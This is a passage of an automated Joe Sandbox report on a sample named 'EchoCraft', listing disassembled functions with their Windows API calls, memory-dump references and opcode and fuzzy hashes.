Part of subcall function 00AF11AF: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00AF11ED
Part of subcall function 00AF11AF: CloseHandle.KERNEL32(00000000), ref: 00AF11FC
Part of subcall function 00AF11AF: InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF120C
Part of subcall function 00AF11AF: LeaveCriticalSection.KERNEL32(00000000), ref: 00AF1213

CloseHandle.KERNELBASE(?,?,00AF0A72), ref: 00AF0A1A
CloseHandle.KERNEL32(?,?,00AF0A72), ref: 00AF0A23
DeleteCriticalSection.KERNEL32(?,?,00AF0A72), ref: 00AF0A36

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseCriticalHandleSection$ExchangeInterlocked$DeleteEnterLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3490608917-0
Opcode ID: 9c9b901e3b47ac81b1b26f1bf5d87143553a5adef2f907b1a3bf96db2725d70d
Instruction ID: 0044ed7e87fdae5130a470170db99c5a96cfabf7ede7f9465003185843d674c3
Opcode Fuzzy Hash: 9c9b901e3b47ac81b1b26f1bf5d87143553a5adef2f907b1a3bf96db2725d70d
Instruction Fuzzy Hash: 13E0E232014507EBC7052FA4FD09888FBB5BF4830036881AAF22583920CF70A564CB5A

Function 00A90AB6 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 460COMMON

Download Yara Rule

Strings

CALL, xrefs: 00AD5B5D

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 8796c6a944382661eb3386ab57a467b4682b88f5d632559548dd9ef2079828f6
Instruction ID: ccc8f6ad60fe218db23cbce68e22d2a4e47557c5253363ba8d5a1ff9890e9e64
Opcode Fuzzy Hash: 8796c6a944382661eb3386ab57a467b4682b88f5d632559548dd9ef2079828f6
Instruction Fuzzy Hash: 461277716083419FDB24DF24C484B6ABBF1BF84344F25895DE99A8B3A2D731ED45CB82

Function 00A93A70 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A93D44

Strings

CALL, xrefs: 00A93D14

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Init_thread_footer
String ID: CALL
API String ID: 1385522511-4196123274
Opcode ID: 6c1cacf6f7dd7f040342610a0aee244a923f70b1d6482de4b2eeb9306da62f46
Instruction ID: dac37de1f9cbf3d9222be14029d6e2462e001bd41672eae86bdea83b9bf5ed6d
Opcode Fuzzy Hash: 6c1cacf6f7dd7f040342610a0aee244a923f70b1d6482de4b2eeb9306da62f46
Instruction Fuzzy Hash: 66919C71204601AFCB10DF14C984B5ABBF1FF84314F14899DE8AA5B3A2CB75EA55CB92

Function 00A82950 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

GetOpenFileNameW.COMDLG32(?), ref: 00AC36EF

Part of subcall function 00A850F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00A85035,?,?,00AC4641,?,?,00000100,00000000,00000000,CMDLINE), ref: 00A85117

Part of subcall function 00A832E0: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00A832FF

Strings

X, xrefs: 00AC36BD

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: 08fa3380299f1b343083d423d94d066470f85ee90c73dfaef9b6009190da8565
Instruction ID: 9a56e2ee61ee0af88282ac1ea7705e566e9d662225ef6c47d657fb5024992e98
Opcode Fuzzy Hash: 08fa3380299f1b343083d423d94d066470f85ee90c73dfaef9b6009190da8565
Instruction Fuzzy Hash: C6216671A042589FDF01EF94C905BEE7BF89F49714F008059E505A7341DFB85A49CFA5

Function 00AA0090 Relevance: 3.1, APIs: 2, Instructions: 94COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00AA012D
SetErrorMode.KERNELBASE ref: 00AA013F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseErrorHandleMode
String ID:
API String ID: 3953868439-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 4a8b850f75a0aac485720757c0bab898863ac903dcac24ca3fa691c953a19bb0
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0531B3B4A00105DFC718DF58D890EA9F7B5FB5A310B6486A5E40ACB696E731EDC1CBD0

Function 00A83DF8 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00A83EC9

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: b4eef353320fa56630e68f3a64810fb33301c304f23562ba4ee0657f29bbd751
Instruction ID: 218957d9d87faac4c75122ba292fa818b2097e0b087f219c6409cb43f27235f6
Opcode Fuzzy Hash: b4eef353320fa56630e68f3a64810fb33301c304f23562ba4ee0657f29bbd751
Instruction Fuzzy Hash: 8431A5B1605701CFD720EF24D845B97BBF8FB49745F00092DF99A87240EB74AA44CB56

Function 00AB4F65 Relevance: 3.1, APIs: 2, Instructions: 67COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00AB4FB1
GetFileType.KERNELBASE(00000000), ref: 00AB4FC3

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: FileHandleType
String ID:
API String ID: 3000768030-0
Opcode ID: 37edd8bf2dcee4fa480ce2ba5bd12a0a908249c1cc30d73804ce2dda1dbf5841
Instruction ID: 2892e69bbd75bd1bc4800672cf99b9034e8d9f9b18de5191badafbb977952a72
Opcode Fuzzy Hash: 37edd8bf2dcee4fa480ce2ba5bd12a0a908249c1cc30d73804ce2dda1dbf5841
Instruction Fuzzy Hash: 17117236508B514AD7304B3E9C887B2BAA8A75A730F380B1AD1B7C75F3D630D9859651

Function 00A828E0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00A82902

Part of subcall function 00A828AB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A828C0
Part of subcall function 00A828AB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A828D7

Part of subcall function 00A8331E: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00A8292D,?), ref: 00A8334E
Part of subcall function 00A8331E: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00A8292D,?), ref: 00A83361
Part of subcall function 00A8331E: GetFullPathNameW.KERNEL32(00007FFF,?,?,00B52408,00B523F0,?,?,?,?,?,?,00A8292D,?), ref: 00A833CD
Part of subcall function 00A8331E: SetCurrentDirectoryW.KERNEL32(?,00000001,00B52408,?,?,?,?,?,?,?,00A8292D,?), ref: 00A8344E

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00A8293C

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: 2f34865fededd7512eb2eeab60612a24b788cb7f603b1989cce5c6b37ce4bd34
Instruction ID: 5444db3b3876bd74ec9369aa585bfe230b077da20772e7392cf92aab912c02bc
Opcode Fuzzy Hash: 2f34865fededd7512eb2eeab60612a24b788cb7f603b1989cce5c6b37ce4bd34
Instruction Fuzzy Hash: BCF08C72941704AFEB11BB70FD5EB6977A4F702712F004896F2028B1F2CFBA94509B98

Function 00AF0984 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00000014,00000FA0,?,00000000,?,00AC3F35,00000000), ref: 00AF09A9
InterlockedExchange.KERNEL32(00000034,00000000), ref: 00AF09CB

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CountCriticalExchangeInitializeInterlockedSectionSpin
String ID:
API String ID: 4104817828-0
Opcode ID: 57630a9da35fdf623565390b6ca585e1936d64f34874519713ff7e9f4b435a70
Instruction ID: 1aae4c540b2e139f9018145de87c62e44c28fc89e7aa0e3c395f5a560cf93505
Opcode Fuzzy Hash: 57630a9da35fdf623565390b6ca585e1936d64f34874519713ff7e9f4b435a70
Instruction Fuzzy Hash: 40F05EB11007059FC3209F56D944CABFBECFF84710B40881EE59683A50CBB4B041CB51

Function 00A93150 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00A9358E

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 487503e84efb125df87c50987757d80eb6e9f03cdb53e41cb93826be403beabc
Instruction ID: e81b3a7094bf7523588a68ee49bbcace0258ba68e377a4b3ee908250674ee8c4
Opcode Fuzzy Hash: 487503e84efb125df87c50987757d80eb6e9f03cdb53e41cb93826be403beabc
Instruction Fuzzy Hash: 6C328A36A04205AFCF24CF58C884BBAB7F5EF48750F15809AE916AB351DB34EE45CB91

Function 00B0785D Relevance: 1.8, APIs: 1, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: LoadString
String ID:
API String ID: 2948472770-0
Opcode ID: 81ad140578799758b7b30510fb504425c712cd24b99b411932ef1f24d5758d71
Instruction ID: ab340407845c302e054af195aed6da8696043f502dfc0e70c1f0ffd37e53e18b
Opcode Fuzzy Hash: 81ad140578799758b7b30510fb504425c712cd24b99b411932ef1f24d5758d71
Instruction Fuzzy Hash: 6DD13935E0420AEFCB14EF98C9919ADFBF5FF48310F548199E915AB291DB30AE41CB90

Function 00AAF1B6 Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88d34981e567ee730df71754d031aeb570dd11a03d60d64129030ac37bb8d4f4
Instruction ID: e8c38c4518d29037f1a4308296762d75402577663ef9d75a673d00f0dfd64490
Opcode Fuzzy Hash: 88d34981e567ee730df71754d031aeb570dd11a03d60d64129030ac37bb8d4f4
Instruction Fuzzy Hash: 63519771A00248AFDF14DF98C840BA97BB5EF86364F1981A9E8599F3D1C731DD42C760

Function 00A82BE0 Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00A8320E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00A82BF2,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A8321A
Part of subcall function 00A8320E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00A8322C
Part of subcall function 00A8320E: FreeLibrary.KERNEL32(00000000,?,?,00A82BF2,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A8323E

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A82C12

Part of subcall function 00A831D7: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00AC3B55,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A831E0
Part of subcall function 00A831D7: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00A831F2
Part of subcall function 00A831D7: FreeLibrary.KERNEL32(00000000,?,?,00AC3B55,?,?,00A82B95,?,00000001,?,?,00000000), ref: 00A83205

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: ba48481da8b80b71600cb419063779fe8658ce7e7c239a2092e59976e5a42f0a
Instruction ID: 98a13e0d40e7a309f1f2849ca2ee2210632f6481b5dedcbb2051bb305739ab95
Opcode Fuzzy Hash: ba48481da8b80b71600cb419063779fe8658ce7e7c239a2092e59976e5a42f0a
Instruction Fuzzy Hash: C711E032600205AACF24BF64CE06FBE7BA5AF50B51F20842DF542AB1D1EF709A459B50

Function 00AB8822 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00AB8860

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 04019d26b200bc5a6146873511a9d97297b748e50e5d2a27fe15e1bed2f6e3d8
Instruction ID: 2b4cda842e79902fa272ff0dbeda261107a8e6152434381305e05a6df76ffa42
Opcode Fuzzy Hash: 04019d26b200bc5a6146873511a9d97297b748e50e5d2a27fe15e1bed2f6e3d8
Instruction Fuzzy Hash: 96111C71904209AFCB15DF98E941DDA7BF8EF48310F154059F809AB352DA31DA11CB65

Function 00AAEA22 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 289e25d2292c90726d7d67d651a91fa5f64da5472410185a57993c777db328bc
Instruction ID: 77758615851402ab82e5238f775890630c1c7911509a471becf5c4848f409fc0
Opcode Fuzzy Hash: 289e25d2292c90726d7d67d651a91fa5f64da5472410185a57993c777db328bc
Instruction Fuzzy Hash: 55F02832501A105AD631BA69DD027AA379CAF433B2F144B16F425931D2CF74D80287A2

Function 00A8C110 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00A8C11A

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: 2ab2e33c78d4d62fcb11f6e4e645a3d299c1deaf5ed12ae6fb487c7bd3802e0e
Instruction ID: c641d1dab9ecd810944b7d3145a23abe0f6a124a4f17c4c67c703dca82d5b187
Opcode Fuzzy Hash: 2ab2e33c78d4d62fcb11f6e4e645a3d299c1deaf5ed12ae6fb487c7bd3802e0e
Instruction Fuzzy Hash: 9FF0C2B26007007ED714AF39D806FA6BBA8EB45760F10822AFA19CB1D1DB71E5148BA4

Function 00AB3C40 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,00AA0215,?,?,00AF1070,0000FFFF), ref: 00AB3C72

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: fa8958183d63c3323a2d7319fc2c61187c6629c8c56b2eb8e0aba396d4f8f4ca
Instruction ID: 7add19be462a054ceff5d45fe4b757ba41fece62b82f1b233f2c54264c29fe9f
Opcode Fuzzy Hash: fa8958183d63c3323a2d7319fc2c61187c6629c8c56b2eb8e0aba396d4f8f4ca
Instruction Fuzzy Hash: E9E0653350176596DE2127FA9D05BEB3E6CAB437A0F550111AC05B70D3DF61CE0842E5

Function 00A82C4E Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffd8c5f617b756c5c2af24bc86294c962ff8b11d1d3402eb3f57ee866744e4e6
Instruction ID: 75fa0e612e4540cb5e05b3cfac25be269e72983f1a23827324c214b71e8958bb
Opcode Fuzzy Hash: ffd8c5f617b756c5c2af24bc86294c962ff8b11d1d3402eb3f57ee866744e4e6
Instruction Fuzzy Hash: 18F015B1105702CFCB34AF64D494A2ABBF4BF14325320C92EE1D682610C7329C40DB00

Function 00A82DAA Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00A82DC8

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
Instruction ID: c069a3104be348d02a5a4a555984aca8c286a746efc7b8fa7fbeec9249791792
Opcode Fuzzy Hash: 6f20ebd9b2a2bf586509a237b68e363968dd7dbffc5f75a367978f3cc06a5eeb
Instruction Fuzzy Hash: 58F0F87240420DFFDF05DF90CA41EAE7BB9FB04318F208449F9159A151C336DA61ABA1

